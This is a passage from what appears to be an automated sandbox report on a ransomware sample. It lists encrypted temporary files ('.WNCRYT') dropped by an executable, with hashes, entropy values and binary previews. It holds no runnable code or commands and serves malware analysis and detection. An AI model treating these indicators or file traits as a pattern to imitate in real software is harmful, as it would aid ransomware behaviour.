                                SHA-512:5E7A1A3B9E756B53421756C4523DD6E1C86C8DD7024E80BD273B5BCC4BF75F0E56A7B0574DAB1CA70CF3E160E2BD8710E553B4BCB5757BAE1BEA831FDC509965
                                Malicious:false
                                Reputation:unknown
                                Preview:..12..~...%..#Mx...."-......R.E..i'..gv.....Q.....c.._.~C....-....0!.3..OH7U.5......Z....#.78...,sVZ(..!Xh.Q.......q.. zF..$x...W.0>..O.<.<+...y..".a.]q ...9.!.e...=....N..Y.D.g.k.3.a..F.).^.$!.~j....D.+....?#....I.z+.Z.....S)]5.U....l..x...1\.?...b..A.o..u.}.^bq.(.vN........;..U6.rOi.;..rK..v6....vW.z...w...9.<..4.q]_.....~I.<..O.#9D}..$..;.4&@.C.ox.......#9.:...X....:=...cba.T..b.H.."r/i:...T.k..M0..A....A....?.....l...u..N.P.,..C...+.....].I..{.J..,....3.5'... ....rN..Ie.Z....(...a..G:a/..?..E.Z....L.v.xvCE.S...&y...k9...m..it.]r.9.P...n.1.....#NO....cA..NG.M.=...4....vdj=(...|Le#....\.IYJ.p.....A...S.H'.u5(#T4M..0.bc...rL.......i.Ki.o......h..@X*...>...sl..k.3...9&...PD!.k...eKR..-....(#y.}k.ALi'.8..@$.....-..w...>.K..J..DG....6y-...P<0.....P.:...c..pm!U.(.*....h.e.......^...t......C..C....LI.@qvn..YT|..KVvM.<;.';....s..l.|..Ax..Y......aC&^o?..4o..F.>.zkX........T[.:R#(<b..A..e.^.?..\....%A...q...r...{..9..$0.O.3...x.|3.L

                                C:\Users\user\AppData\Local\Temp\35.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820509222168795
                                Encrypted:false
                                SSDEEP:24:39KzdSgr0wo86R0cM5fQ5YlNcn1rr+A8ISMcCX8PZ:3buwOcMq5mNcn1rqwSMcCX8x
                                MD5:5A6E07C6E3DD1EDFEB8547D83522E015
                                SHA1:4E28188EBE1AC8FB3E310CA41B498B424AF138B8
                                SHA-256:0FF075EC400A01D6B9EFE24C1A273E5243FF7C36FF27F5C7AD5C6FE63D132BF0
                                SHA-512:72DB5B1AB82A48135EF187C9C80D13A9ECC59705FCA39984A335AA62DA62E05B2E144710F3568D911E22D5C38A1268358D692954A81CF259F2027F6F5222A715
                                Malicious:false
                                Reputation:unknown
                                Preview:.AZ..k.E..L...n{.J....d.....[..|Ye._.^.......W|5..SW.Cq..=q[....X.g.s_E..~.....(b...A.<.F[....1.jgh;..1.{.I.....c]..q..p|....l.1p..gJ..K|.M)L82.".......,......"..$..]3F26..7.t.h.1....X..A.4.5.z.^.89Ob....(.?.o{.t.k.......-...%^.rc..c;..........D."t..G$......*...mu....y........G...,B..,h...:..w;.....L....e#.|w;.A....E....._l....0d....|.*.C...G...hh.$..R.[......&#....'.1:.......x2........|..A..5.65T....g...r.....X._T...b..0.E.1i..'....0......ef..c.I....{n.7...9WF...z.E.e.6..yp....M[.m*~....U)....0.r.....f`e../O.....w0>.e.v.nv......`......N..\=..V;z6...1(.....P...NB.V.bi~.JU.<.)9.&..._.Y.....R./.%.q..#.....c....jIt....R......I.W}0>.o...K-.....7....^...8......d.A..:..'gW..8_d.E8FL......n!.$.u.. .h..A@...)]!..S..f|......../h.D&.........".....M.."K........=...Mt......lJuG..-.qa...1L...+.....L..D^.(.j.E*...n..7q.....V.F6..c.2F.w....y..n....-.i....,..~.uot.....Cyr.G..'H$.g..0......{....U..H....;R....].`...#M...c......!.....S...G.../.=j...b.`...s...,

                                C:\Users\user\AppData\Local\Temp\36.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.830566393939644
                                Encrypted:false
                                SSDEEP:24:Nv8rKdYhXeAtJzwPLMmqWZMNyJoAD2XUHsFyp1IXLv+l:x6nhXRzzA8WZMNyv7Hkyp1YLv4
                                MD5:F34E56D59DCBCECCA58147D35B6F0416
                                SHA1:6BF0DF358E18DBBAC3E59351A0ECA82E514F5840
                                SHA-256:AD04F4971949C0A60EEEDB4B84829805DDE83A0736F0E35C46AC919C69EE8DBC
                                SHA-512:A8AAAC78E102B49EA3CA4886DDD5452BAFAA2940A372D7540AB425CA972DE29AE7079419BE06573D468437CBB449F64C9D64038EF12CE36219240018FEC825DD
                                Malicious:false
                                Reputation:unknown
                                Preview:.^....9..)..G......d9......<N..0:.v.......Q..U.?.\.tk.w|~).!..k.!.2s!...E..\(_d..P...l...l.`..M4u...._..]......p.k.hR......\...ndS...v^....Bz1.,E..$..aBh.p.UU.......p"'A.{...(...1.i(.k/..).[...^'.".]p.ve.9K.~.~C...n..;(......gFr....,.....G.u..pE.t..c.................&q...;.vu..*.<...@c..K.5..|\.e.........=.....n......6.O.....6U.......+...WN..K..{...J(.....-.x..%........=.H.....t..%..m....l.[...A....a.l.C.r........a..03E.t@p`.....f..{....r...MH}...A.w.6x..<.?9m.|.....4Q..=.c.w,.s.'(...N@7X.6j..qe.b.Vo.{t..+....D..+.......0....y.4q....2..`L:.4"..[.B.vj...$.C....rE..!Rl.[...j.....E..S...Zt.\..T..Yk..~#.....G...w&...l.=....i8..o...S>..Xm.K&..IPM4dl....4...7^.....z..&.}..bT.....=.'..}.]...~X.,..\.......zO......3.....%*...Z&...\duJ^...V....G.uqN.(.x".....TN.:.W".Yye.=g.O..M.6s)..>U..I. .Qg..)..Ou...nAZ:4...mx.-..*.u3+...}..5#.D.O(maz..s.@..D..?.z.........!Y...._.>...3p.-7.-....?t.Fv0P$.bi.{.2......J...Za.G.-Q..y.7J.O...!.b.#1.....1.-...i...u....

                                C:\Users\user\AppData\Local\Temp\37.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.829968915408538
                                Encrypted:false
                                SSDEEP:24:54hJCMEUtD6JAVAY6vyII11yQJQpWKgQS+UXKk:5T9giBtyIIXylnWKk
                                MD5:27A49D9ECC46648125A673BDF43543E7
                                SHA1:47D8EBA2EDBB3C3EFB9C49CDB8D070A8CDB34C96
                                SHA-256:A952D25E654BC37E5CB0233D0C134C52CB1A4EF3F547B3BE2F313FA993C25C5A
                                SHA-512:B899D2B70327D81BA19E056756F247AE3A0945DBBE9E2051F75820E8CC3757CDB6876389D1863B4698A3AD80B52B155225002A35968C6B69A7F2E5682B1AF8AD
                                Malicious:false
                                Reputation:unknown
                                Preview:\.)..Y..p.S.EuN....3...h,#K.}bJ.7)%.Y^H.|.y.d....4}..7.o..^.....=..p.5%..`.q.z.g......?s.&X.._.QT._..`.T..o.X.dC....H.[.;p.-..\.K...Xu.1XGP=.t.H.]...Ca...a.=.s..o)..e.K....J.?-.A...x/..y.......O.bw....{...j..*.v..L..g....>Q\sZ.....G_.6.....~@...Y..~(.'..4.......6T.1..(..e...z.J.eGp...f.FQ.h.p.n....[.6..`.)...L..*o:m;..^w%J....-../$.....`.....-.K....<`^F}...Q(.e%yPA.0a.....s.>..p.<.q.L...x....."...#...9yM_..j:%.6...X.'74?....vPu"i"...k.@.....A.v.2(a......V.|..`.._....n.m......-i....d:..1....+2j}.4+.).?_....3....>nJ5..?..^...>..n...I.8..;.y.R..!=.|UL3J.#{.x.$..$/K.rZ.^..d.uT.D. }..0.L..x.<Z..f.DQ..c...l..$J..8....H:.3. .....{<U......pV.n..k\=.......A..h:.:.*w.?...i+..7..uM.. 7..:K.r.w.E...M.......n.G.4.*.t".......fk.i.[n...%[.7V.?..HsL./..f.me3.$|.Cv.z..)3.zw1&..........Y..)...}s-..t..8...!.l.S....1.eTvM=;...'....#w..K.".e.|.]O!rS.T..0$9...O.;..N.-.`....K.1Zv..t..7R@L....`..I.C...Yb9*...,".gBy.D...M..m.....f'.c..Jg..G.].>..d.:..x.D.\......,>...)..

                                C:\Users\user\AppData\Local\Temp\38.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807707754121254
                                Encrypted:false
                                SSDEEP:24:bWpZTXI3gX2S0HX6GRc7Q2inoectN5VLxnMlFu4:SpZTIgXB0HXHRQQ28pSLxMvu4
                                MD5:A3D5C949D65B462B8876FFE5B4A7D6F3
                                SHA1:AE3E5AC0C39269E4589A02C96519C088CC1EAD25
                                SHA-256:0820C12E14C803792CC8BE1C62190ED3D98E27CDFA14054C193F45A118D62721
                                SHA-512:2FACE32C17BE4AE667B7816F9F865433C658329BFD45AE822A318C48D8B1CBE2D0CF4C245783F34D3FB8D12B77DFA1498DFF08D828D1D15A548317D74DD162AB
                                Malicious:false
                                Reputation:unknown
                                Preview:.)9.j.g..X.y.m/..Fe.W.....]...V.J\....T~#C[V.=..D.+.J.L......<Th.ib.h-.......f-.hv2....o.Xm.X<..^.f;D8..J.].(2.(..Je..6.*.Zh,.<...h.....' .ugL..\..T.&Wh.\..n.@...DB&.xR..4.c.....T..,$/..mP..HI.6..^.......]:.t....;rUG.DC...P...).e.r.J.9..E.10.O. .eZ.+i..Dh........=d+...Ea..>....">'.G.."...r.}..J~.Dn..A;...P...&....@E,..qC.....b%.&..r6.:HA..yN.....g...O..%...Z.N...:d........;.f....]...ST....A..0B..'....P71..}Z...v!N.%...4.....NA..<.:e.brT.....XTV..B]..[.....b..].b........p.+~..DC......kf.BI..........pyW...V1..#...Te@.O.4.....*.\b|9-....UZ...A.."`x.T#.]..o$....%_I.*...A.n..-....}.Mc..&[.......~...H......S+.q&k.~".)1t..H.<$~.vF..Dl.!.l...$..#J.....V.U.&x......ZXk.W..f.?..Z..*...R.......9..:...G.@......E.{q.J\j.+...<.e..B.v.=..u..MH.v..9*.....~.J..t.~...J.b,N..lBTF{.._.`....u...7d..h\..I...#K....1.m..V.....P........:p2M..MF...9.o...a..<....G.....Mq..N.t..f......*P. ......2v...|.z....m.S...#i..H.=e#oW*ul.KM... 9.$*U.x....x.../E..pmA.

                                C:\Users\user\AppData\Local\Temp\39.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.782388491358477
                                Encrypted:false
                                SSDEEP:24:pQeWISeNeZWSbpbZ79KcYVdIhbDzQGYl7et1KC2qwA6RkE:pwISUewSn79HYVdefcZ1et1hbwAVE
                                MD5:8BF38AFBF8F8E8F7C17A72BF6D60A291
                                SHA1:8BBC577A8989646907DD4D8793F21687D54AAD87
                                SHA-256:6A8F6E4A71FD0855E39AEF798A7F666DB6C6EB2A7A0F3496A126AAEC566BD26E
                                SHA-512:88C3D2338362A9414AB83C82D7D27C765BE3ADB7A98C221EDFCEC1E3EE4BF54F8D2C5F7289F54CA332A2DF6C2599DA5A360528FC57FB81CC8922B99D9D8D4D4F
                                Malicious:false
                                Reputation:unknown
                                Preview:....}?..Q...I(..h.X...7..@...W.a...K.....0...s@|.d..e.FN...A....vC.aB..g....\..H...X....$.8...~.........#..a.lV,.Ck.Y..!L%..6.........=YkT.."/.,..'V...{.S.~A...x/S....E.##.....dF......,X}9.n&..%...\&.8.dy..I.*.....,S.......WY.Lx......W.X..-.q.>....}:...L.@j...Z.y|..=_-....U..r..h......~7G.Y~..?..#Z.&..j.r.:;..j..9...sZ....a&..Q...>..)d.....QZ.s.7.6*.....1.*!...L.P..B....8.AJ.(3.........=.c)..Y. .fD..oOM.E.n.70...^.H.m.04..'.a.f=.....O.K.W..`..aoy...J....:..cd.....}.F..`......`.f.$.....!.5kx8...b2{5...@.eQ.[..o.........y(.My^.....k.)?|.,.{ .N..sH6_........t.6^.Q.k..."..H........9.O.9_...W.V...{'c...!h....u8uK..cGr......j.q..>.Db.W.d5.]Rw... ...&.V............v.......}....].....!;... J+*.E...S..."2..Q.im.Ncd.J.R....!..w]..)....%.P..y.Tt..3h.d.....\m.?| k..c;%/.".2..#..m..M..,...,E;.....r.}^P)..123./JxX.n...V9.:,}.y..F`.VA.....w.G..:^M7.R$..+RT.EK....;e..0..k.9.......$J .~.5..(.Wq...K=d.'.......M.Za......c%*}-A..#...I.j?(D....a...E.E.d.k..q

                                C:\Users\user\AppData\Local\Temp\4.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8298450175821435
                                Encrypted:false
                                SSDEEP:24:i08BQjZjvvl2U1voXBlAJ/oFUNBDNNKJHjqpB4YZ8za4CTA1ziuh:ikjvvwU4vFUNBDNgJHoGTaA5nh
                                MD5:460B014EE93B20824EB086F721D07CC0
                                SHA1:2635328CCAAF18E761EA7D4170C518A54EE52B6A
                                SHA-256:7F13EDDB728612BCEAA4B236EF920130AC82EA71FA599D00218A2E075BCE8FBC
                                SHA-512:689A9ADC225E797FF07F20A431675BFFB7E95A05BACC7F1A6B6889279EACDAA4A4039AB587244D9B036C46B9195A76C5CC15730B60F84A63A63CD70B78ABC675
                                Malicious:false
                                Reputation:unknown
                                Preview:.k..1..5.|G...m.g+.D.....L..A...R#..X..;.;_{md.e.Gy...X..91.J<.#z4..I.C:...Kj.+.9Ow.._.("...U-..V....bU.._1..9..v..>..RKp..Q.....x...._.I.......++jc.e'.E*~FO.....fgv.l.r...X,.....T.!SZ.nLnr4E.1...m..]@A.fvS..8G...0W......W8."..w.;.QX.`.N....^.Y%.p...&S.J.......}[..p\._..W...mt.......e0.nLd#..ZS..`.G.._..5h...gY..=.b..%F.}g.&j..w.N6....+..T.#....].U.#.(.#...i.kom..rW.:...p.S~&.p..p0.Y..(z.goK..,........44g...."R.0.m......n[#.t..4D1..\.5.N...$x..cP.X..._..4`.6....>.'....~.V^.gp\X{k...=u$Lz5.'..........*..]^.U..a..0..VYA...."qI...N...`..'.H.;......)_fR,...b..5.7...;.i...p..:O....^.3....(..fC..S....+...(....~....d.......C......R....7Rq.g.Hh...~0.2.........x?..9.ht.Y..A.......4..q../..&...~...^.U...s.x....[...M...m..\..Z..{.e..s/..<...*47.|aJ...$<....wW..L..llwV........K....p#79....>..[.b......ht..o..f3.:.D....u4.uz.]...sbH9....f.t..%.<T..b5.b.rN.@.._.......{..yu.o.b.#xbw/RL..K.MYh.KWc.F.C.).....&.H.|.p....9.<.). .f6...o./Z..l..o. ..V.....e

                                C:\Users\user\AppData\Local\Temp\40.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823856327616033
                                Encrypted:false
                                SSDEEP:24:Z0C6Bje+sZA8N71mPAlgLdlemH+FfbdgcWeh1JxN:xAje+sZZh1LlgLnUMe9
                                MD5:9AB06F4CB3DC2BF7166E3E2C19AC9B2C
                                SHA1:22F6F23198041CCA6C76435AB902728A91E58177
                                SHA-256:0BE27A9DC89024B80F64F43950958799493F34C213E23601990C283E72A965BD
                                SHA-512:E186C95BBD78B48E08B41DE9F7CA2D9D2A66A0CC55C0E5FDE36AFD7016974B49BF5AFB01B26AF82534FE90077B1E83FC5DE53E22EDB308426257CE37F19CEE4F
                                Malicious:false
                                Reputation:unknown
                                Preview:....f....... ....dC....+{..........4.y.....oend...#+*.hZ.&.7..e.OI~..6^......e.Ov..<..7.}....H...9+. ..q-.J...p.'.k*C.i....S..o.>`*my...<........D.G...0*6.9Z$<;....A.D...P.....v...7.;...........fy...ku}.}...'..F....#..#..z.Q..N?...9.'.W:KbE.<s.....Q.........8...V..KXY}A.S...F)".....U 6*.1.]nU...].V.r..m..oD..PIg..m!.v.{.Ki.w...}.UF..q.I.u..f..B.....R...U}..ObY..3S.F.[!...I...=...'....w....b..u.V..3:$kjj7W..7:d..u..P..=..x.p.s....B.....v9@....t.......z`K.......k..!N...m.9+..D...HpsC.'..r.SS).....@....lS.%..`.B._..._<.....;JF...lh..............Ld3.v..?.^wA....;n.@|..Z<R.L.{.m.$.d.0h&6.]...`.[.(..z....;..W..JC.6.....r....jjI..Q.fH/c...K..?q.9.c.......C...+bi..(t..Q.tU...v.....).}....H.W.i........C.Kt.+.O1.\X..iU._+..3....K{..P..R.3P....M...T..>{....7......A......3.%>-RG{.$Y*znI.....I%/..g..B.{\.6...D...X.7..";'.hg....L5..xZu..JT..YS.S..{..^G..lX...I.f..A...1.jU.pz...... .Tp......;...H.f.>.4W...*ag.X$.f.5~r./wcH. ..+yE../w.k....}(.

                                C:\Users\user\AppData\Local\Temp\41.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PGP Secret Sub-key -
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.781439569212249
                                Encrypted:false
                                SSDEEP:24:u9w0kC6ufM0svyrroAeGHtTOOR5YTtQRt+x:t0R6qoy4O5PR5Yie
                                MD5:9DF6847CF6CDEA0D1FF23B2A1BE43743
                                SHA1:2F2D922C09CAE591BD18186CB732318ED8E356DA
                                SHA-256:F2A284974646E77F3BEDE2D5F56C62F43D67DBB821AAB759CDE8245C7063B018
                                SHA-512:947B1421B56134C0A6AFD47C0514248E7691517C68187044A6EADBF0B5195A3ECBA59163CFD77814C2B0993131D193E7D568EB3FB7A84EE057F1AE505B6C47E3
                                Malicious:false
                                Reputation:unknown
                                Preview:.w....H....t..@`...!.........;8.3`i.*N1l..(LW..<....B......&.'1(g2.E....H.hw.w.{7|......!F...7g..s..Y.%../uea..uV.7!..%.:AM...f.Q......,.z.C&...%...C_Af.!..opY..="+n.Ea..%..Su.............u.WZ..pbw.?...T.....u..[.t.(..!......L~...{.a.....~..S<..^....ok.W..D.{...R<.Se..tW.......b.$....D9G..Y.~...:..o.....vK......lo..W.^K[x..........!.3<......o.....5?X.)..*.b.l...`v/t..Z...Wx.b.p...H..L.$..6..a%..OA.....s.......}o....s]pe. .?L..j....."zH.9..#..z9...R].. ...^.J..BX?=#...2{...B./cd&3R-..&o...Nb#.x....DQ..DX.H...1L....i............p..7...R.~.(....?....P....q{..N..T..*.......zd...7...E.^.(..~u.....;....C......@........y3.7..=..O...D$.....Z'e>.. 1T&......o..w.g...l.Kz.......a.P\+...&).....]H..-....V...+PR...n....8B..."n.G..f=Y4.N..u-...&r.jC.FL{......r..j.g..~.4c..v.T...d.......x%o..3.Wv.../.b.bYY.\..L.)_P...n....2.Iy.B............(@Y..h.q.vH..>9.......=....Wr.T..1.[@`@...b.S.V....]...[..M...s.#..t.+H....o~.yV..j..!v".....}([..ov...o.x..@.

                                C:\Users\user\AppData\Local\Temp\42.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796914217785424
                                Encrypted:false
                                SSDEEP:24:I4by4xaIU/vDoL4ICopsP26kV6ZrxYOOrjgm35RHtnD/uKVXzJu9EKMNC0U:IGyfZTRICcqR5ZSngsftaKVXEWbNC0U
                                MD5:44BC996846993CFDBA52B7D5376C7A05
                                SHA1:8B247D2D30C83B2287071CC644EF96D94E15B146
                                SHA-256:5ED6EF496DC692CBA9E4882E8C4F292DE29C3327CF5255B2E85274617F4848DD
                                SHA-512:B201031B83BA9A702E3CF111005A1E988EAE9B6EEB7C9FD75EDB054E2496A1F057F56A44BDB710C5A4B0FDAEA7CC21672D027FF68D9FD9DC634816718676DCB1
                                Malicious:false
                                Reputation:unknown
                                Preview:.|B...I.+.AOB...:3..?.or.2xp.F.A...X..7........`.o.LK.6.....y.n.^..S...].w..K`.-...9...xs.L..hUJ.(...wo....qF^..,^....H.<|..:]..9L$3..U.h........#-..y..h...0v..U....H.#.l....RR...A..?.._.0....k..4*..[OS.5...$2.f..8...P?...,D.F'."k.....l......j'.P..J.........-8.()...8.._..{*......5...._.?....G..s.;..q..\.&.C .s\..H.D.A..q.j..:/.....W......d@'.*=......v*....I....%(...m=....;.fB..&..H.p9s...K=S...~.Y...8..p..Vc..2J...N.`...{R.D.Xch......&...Wo.,.|as/..O.\.6.....rA.X....Uu....o..+.v....F..uS...*.S.+...D...L..4..Ef..*.Q.(.hc..<Q.~.Eb..O...o..f....h@..4...g.... ...W[....\.._..`....<;..vL..-...+.}.A..N........=#!.Nw.!.A...L..[.,?.Q/..()ji.GZ.A..n~*...e.......ECn...."...X7j...Gf..D..1}.L...D..A..D......[...&.E%.THC.!h..!......0#!.3.:......3....y.g.._.'..L.O.H.e...#.,8I..^<..J.'..3A.n*=9....#...>.....h..c..NPTE.....r,Ix...&.E.E....h....R...3Ab..i....Ti.....D..J...3.^....."0.^#...P...+.q0...........Q..s..Z0.o.....elol..L.=.@.C.9....~.....g(.

                                C:\Users\user\AppData\Local\Temp\43.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.828589881678447
                                Encrypted:false
                                SSDEEP:24:UtSNpPyyo4FyktuOH7LdoX/53LlWyJiE4WpRnmUTJ5p15F4R:4SNp6yomfc0dox3Ll4kBmUDM
                                MD5:C0159297ADFF3043A6F4851207B6E825
                                SHA1:520D2F9E16BD5506715DE1991B17147462C437F9
                                SHA-256:A673CE8DFA0E147EAB0CE46E2AA80AEBBBDD13F76A6AD2B3D9D2E0AF647BEC0D
                                SHA-512:E0E6420EDAA066A803FD89654134664B1CD586F1101F8AAF8D0477EBA30AC9E7D71DAAAE7A1C94EC53E62364A689E85BBB9EF526A2E768DE50CD3C5530F3547B
                                Malicious:false
                                Reputation:unknown
                                Preview:H@.3...(.|ZA..T.....=..c...t..}.Z....QLT...CP/.eN..`.".S.....Z...?....^..Q.O......C.+..Y:/.2...../=i.2.B..x.I...l]....K7....s.j..h..p.k...C..0........%....c....;*.&..(..5...3../z...P^.M.b.r.9i.....1..P..JAR$.....{2..&n.@y/Q.'..&a.}....I....v........=..H`D..q.z{....?Hs3... .2.-.....9.2...2.y.....#...a...6]i......~......\.y.~...'..h.:..oE.9....C.-Y..#..n.S..G.0SG.......=..e.....-*Y*.....t..)o.2...HyL..,..;....d.|...$i..Q...3..[.z^...;..@.). B.$.B"..A.!9..;..u.N..._o..)....zZ.i((.{.:T.#..wk.eNgO3`f.....s..]./|{cS....%..C.J..9\..a..!...d..4... .l+.0E.je.$.bg......m_.."Xl...Q..."....(~Q..!...L4@..k..j.V].....&.i.Lc...8F.U..bt...0...~..6.5.....X....\...}}]..:Pj=}...7c4..Zj...u...F<.O.nw.:...!l...P.K...q[.D..,...8.hC9zQ].qiS^...=..2.g.Y.}p...{%.....]...S]6.w>)..d....l...^.w.4.......|..........IE...c.9.V..L.".......f>...*..]H..a...^.&...3W.@....f..y.7..'....b..^L...;..._w>DS...'.M..0....1.....Q.!f..g.S.#_...d_... J........m.@t...E..t.(.w.r.e)........D

                                C:\Users\user\AppData\Local\Temp\44.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807597186214773
                                Encrypted:false
                                SSDEEP:24:4lwDhfyX1YujPBr/+BDsBVt2W6kkDsTK9YvdSXchwE9uch7K4MG6/l1awPz2:sO21YSP4at2W6kpKW4XcDuaxMGAfaw6
                                MD5:EC7D55E70F064DCE637E8621F5127B8C
                                SHA1:5B06575BFC5D2DE24BD4F78502E1DAAFBC5C82CB
                                SHA-256:56EE07AE62A5FE0930B24EB7FC003128582D9A059675119A19A28C17FD187D50
                                SHA-512:DC6D7B6D977939EE472DFD14FF5974FE7F788AB0FF34FB100AFC791CC70E7238252680EA82AE6FDBCD6957A21D079670A8DEF64E3CA2B4D0576397B179796FF7
                                Malicious:false
                                Reputation:unknown
                                Preview:..>BQ.`&.|/i....(..~c&....|.t..Ft.c.~Gy.....0..z+.@.@.w..jG7....O..........S...<..T.....G)_%..V...`.l/H..w...N...E.Nj.pfBG;d.. d...C....H.........WG.v.(.`~~]J.S...6...X..m...6..;h.T..-V9G.R.o...y....3..h3...}..\.H.s.7: .b%.&/Oq.t&.V....GR.G.@..j`h.#..............J.D.......B.2.N......#..I.~.....`...d..;Y..g]O.pX..'.Z.].O........E.A.1..........[.........qC..y.M....F-^w.L.n?1..4.../..Ql.ap.?[r..a.;.....3..t.4....@..>..+9"..J.~_.2..... S.;+..&{S:.@..1^.......[.:v..!N.?-..r..K7...@.2......1....S.........Pg|...&_.q..F..+.R0x......N.}........|%..._*.I.y.....0..'5...C.._......i:r.......j.....X.n...i.o*....U=..........X.N.1...v.M...y+..5,3.........w...E...nYM.2....1@P........Cc.(..W)...........%..Fc.g3..o.x..}..c+c..s..?..D*.6.V......Z....F.}: ..8...Cy..(k2>.tHm0_i.z.k...&....a...R.L..U1...u..Hd0.TYW.o.*..3.CM.J...........".6.}`.2.d...M...I....V..NZR...>....T;(h/P.....G/...!!3p.-.-8T..G.......1T<IF..6".W~3...o..<..rW..H..^...N.SKv..-......$.....K..U

                                C:\Users\user\AppData\Local\Temp\45.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8291609997912746
                                Encrypted:false
                                SSDEEP:24:an8Mc430gzbB1dFOd9wzpuqXF5v4CD9jPWhLuYotN:rMcM0obB3w9wzbv4ChLWhLuYe
                                MD5:1CEB65BE7B53214D0287AEB8B6F02FBB
                                SHA1:34099CFC592C9096A00BB77EFA10C3081DF3D398
                                SHA-256:47C9C7F6CDF1754F0A18B9F28C5B66E2C690CEF8727D5DF279040BF3A597904A
                                SHA-512:20A5A0B7646A4568D8FFDD9E5B864D5F2EF600BE84E4C5851BAC9D263950E37E03846022F304EBD25D3C2FD3631481421C4179F253C00C59C3FEA6F88D70AB6D
                                Malicious:false
                                Reputation:unknown
                                Preview:.QM....6..u$.. Q......YRD.g.l.m...c......o...A.y5...<....<..p........OK.KO.i.w2.V..H.S....j.x<'G0S.......N...Yp.M..@.....mK..%...q..:.6..F.g..r$.....o..].....ON7o.-.\..q....N.E..V.'..../..]..6d..;...u..&.k...K%Df.@.ZUD...........x....1,Z....9...>...@..u..\..A.....<....>K..a...mv.%n...W.mG-..Ld5o.'.j.....c..H.....Y.g..P:Y...V.?....]H0..2..^....|s...O.[.i.K.fQ...Pj.i.|w..yG5.........O}.h.i.vU..3g..p.../8N({.nn..#=........ [t...b...nL.. _....h'......~...d....P....r&g....\W].......Ee\g.i.*...g...w.}j.EC.x....?k$....|...>.wo&jx...EQ'n.mlIBKNmq...Y...=.!..K.nj.]C.a.#.a........5?|..g|x.2.9E......!...I-..{n.....@..].Fc...F.....bV.[1.y.W=">.....r..\....D.y.e.y;D.....m..E}:X1...SW.....`F.......0.o(....v...> .)..D.U.]............j..'.;..I..d..)=.M.....q...F./...b..Aq...;..o...8.l+.Y)...X.6.X.<....._.........(..Z..a3.ZK.V..+#.J.0..Fs../zO......h0....zD./&.=36Y[P..V./`A..r1....N.Z.0u.....M.j.=.K..._.eN...z.~..2.SB..+.9.....A..(u;..h.%.lF...U.D9|..Mc.HT.`{

                                C:\Users\user\AppData\Local\Temp\46.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.813557426328387
                                Encrypted:false
                                SSDEEP:24:H1SQU2lKhKYz575uZTzdtYkeXFL3jiqBkrVS:H1SQU2l0KYz5stzvBy9184
                                MD5:D2D36C971D3B8F559DEC6B2ECCBD0076
                                SHA1:C6F5E5C674BC3DEB20E788C476BAB9DF23E12080
                                SHA-256:8173A49907225F5D34F233F0C84ACD10195A1FDAD318E4E7365C0343D2627FF7
                                SHA-512:850686B68ACE86F35D041065F222FCD8EB31EF39865E22D185FDB9102AA086C76E38C32C9FBB35A4D04BE10CE6018B1AB39091D8B5D5F8DBD8272F458E4E9EC2
                                Malicious:false
                                Reputation:unknown
                                Preview:._..j..J..R.}..4...K.k."[@O.h...f..>....X.......4.. y.<..X.A..N{Y.9..8.a2@...E..x...ZEW..s.4..M09M.....Q......;~"5.U.A....L...v.H..#MTO.3.t....&..O3:...c....fo).Is.>...(.l.:8...@._....J.$.../:n.0S.q.-Z'_....!?(.+4m.mH.......Oy..3......\..7i`.....E..o.......]X..P.J=.|9.m......s...|.:..R....<.M....G..L...G.....Y...K3._6.j.}?...CX..gs.sc.H.m......g...6...;..x...02..g.......U.-......}fQ...E.F.;b.E.M.......h.y.....R$$..!4..l....uz...G....."@P.t.]..'. ...Z{..zG..(QA.|..-...>).yd.....Ail.*.....N...MV..........._.H.Vo.a.e...4..\.P.J.j9..S(.[.j..Y..4S...#.z{H..#...c..I..................E`;.........@...!W.....'J>j.......".O.^.w.h...f!.>u..}_.W7JZ.......p^."{.w.*...DD.:OV..C........a..7v.X..nd^..zS...#..m......4..../qu...k.....;8..?l7....^};m.^K.<....c*%.[.u.+.p.b..2#(O.[..&.,.}......tH.I..O..!.c..N.F)....q1H{....._>{.a}...r.3.4..+l..%.0.5D...1.IMD.3..;.|..K....X.-4.=a...N..o.H).c..R.)..?..Ap.k......l.,d.x.p....4.o.A...%=.i.)..Lh.t4S.u6...HE.?..+c.)

                                C:\Users\user\AppData\Local\Temp\47.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820497177347472
                                Encrypted:false
